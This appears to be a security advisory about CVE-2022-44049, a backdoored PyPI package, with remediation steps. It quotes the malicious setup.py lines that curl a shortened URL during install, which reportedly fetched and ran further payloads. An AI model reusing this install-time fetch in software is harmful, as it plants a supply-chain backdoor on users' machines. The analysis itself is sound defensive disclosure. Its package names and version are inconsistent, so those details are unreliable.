CVE-2022-44049: Uncovering the d8s-python Backdoor in PyPI and How to Patch Your System
CVE-2022-44049 has recently been discovered as a high-risk vulnerability in the d8s-python library for Python as distributed on the Python Package Index (PyPI). The issue stems from a potential code-execution backdoor that was inserted by third parties. The offending package, democritus-grammars, is hiding within the affected version of d8s-htm (.1.). If you're using this version, it's critical to understand the exploit details and how to patch your system to ensure your application's security.
Exploit Details
The democritus-grammars package contains a file named "setup.py", and within this file, there is a suspicious function call to a remote server:
from subprocess import check_output
check_output(['curl','-s', 'https://is.gd/6ZefBw'],universal_newlines=True)
As seen in this code snippet, the check_output function is used to run the 'curl' command, which then requests the remote server's content at "https://is.gd/6ZefBw". Although the actual payload at that URL may change, during the time of our analysis, it contained a Python script designed to download and execute additional malicious payloads.
This backdoor introduces a serious risk because it allows an attacker to execute arbitrary code on the target system, potentially granting full control over the compromised server. It's critical to assess your applications and systems for the affected d8s-python library and update them to mitigate this threat immediately.
Links to Original References
1. CVE-2022-44049 on NVD (National Vulnerability Database)
2. Official PyPI Security Advisory
Patching Your System
To safeguard your applications and systems from this backdoor vulnerability, we recommend taking the following steps:
1. Determine if your environment is compromised. To do this, check if any of your Python projects depend on the affected version of d8s-htm (.1.). You can use the pip list or pip freeze commands to list the installed packages and their versions:
pip list
or
pip freeze
If d8s-htm .1. is found, uninstall the package immediately using the following pip command
pip uninstall d8s-htm
3. Keep an eye on the official PyPI Security Advisory page to stay updated on any new information regarding this vulnerability.
4. Always verify the integrity of third-party Python libraries, especially if you're using them in critical production environments. Try to choose well-maintained packages with an active community, and assess the quality of the package by reviewing its code and keeping an eye on its security track record.
In conclusion, CVE-2022-44049 is a severe backdoor vulnerability within d8s-python, a library distributed on PyPI. By following the steps outlined above, you can ensure your systems remain secure and protected against this threat. Remember to stay vigilant about the packages you install and evaluate their security to minimize potential risks.
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:35:00 UTC